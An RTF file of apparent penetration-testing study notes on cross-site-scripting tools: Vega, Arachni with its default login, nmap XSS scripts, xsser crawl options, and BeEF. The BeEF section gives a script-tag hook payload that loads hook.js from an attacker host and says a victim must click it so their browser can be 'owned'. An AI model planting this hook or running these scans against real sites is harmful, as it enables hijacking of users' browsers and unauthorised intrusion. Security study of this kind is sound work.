{\rtf1\ansi\ansicpg1252\cocoartf1404\cocoasubrtf470
{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
\paperw11900\paperh16840\margl1440\margr1440\vieww17300\viewh10580\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\b\fs32 \cf0 \ul \ulc0 TOOLS\
\
\pard\pardeftab720\partightenfactor0

\b0 \cf0 \ulnone - 
\b Vega
\b0 \
		\
	Is able to show XSS vulnerabilities and highlights the vulnerable parameter\
\
- 
\b Arachni
\b0 \
	\
	Go to the directory   -> in bin folder\
	./arachni_web		-> It will prob start on localhost:9292 \'97 Creds admin@admin.admin and pass = administrator\
	\
- 
\b nmap
\b0 \
\
	nmap -p80 - -script http-stored-xss.nse 
\fs28 - -script-args=httpspider.maxpagecount=200 
\fs32 <target>\
	nmap -p80 - -script http-dombased-xss.nse 
\fs28 - -script-args=httpspider.maxpagecount=200 
\fs32 <target>\
	nmap -p80 - -script http-phpself-xss.nse 
\fs28 - -script-args=httpspider.maxpagecount=200 
\fs32 <target>\
\
- 
\b xsser
\b0 \
\
	xsser -c100 - -Cw=4 -u <target>\
		\
		-c number of pages to crawl\
		- -Cw depth of the crawler\
		- -user-agent=AGENT  -> to provide that the request came from a specific browser\
\
\pard\pardeftab720\partightenfactor0
\cf0 - 
\b BeEF
\b0 \
\
	Open beef in localhost:3000\
\
	To own a user you have to make him click on the hook\
\
	<script src=\'93http://192.168.0.5:3000/hook.js\'94></script>\
\
\pard\pardeftab720\partightenfactor0
\cf0 You can view info in Details and execute attacks in Commands tab\
}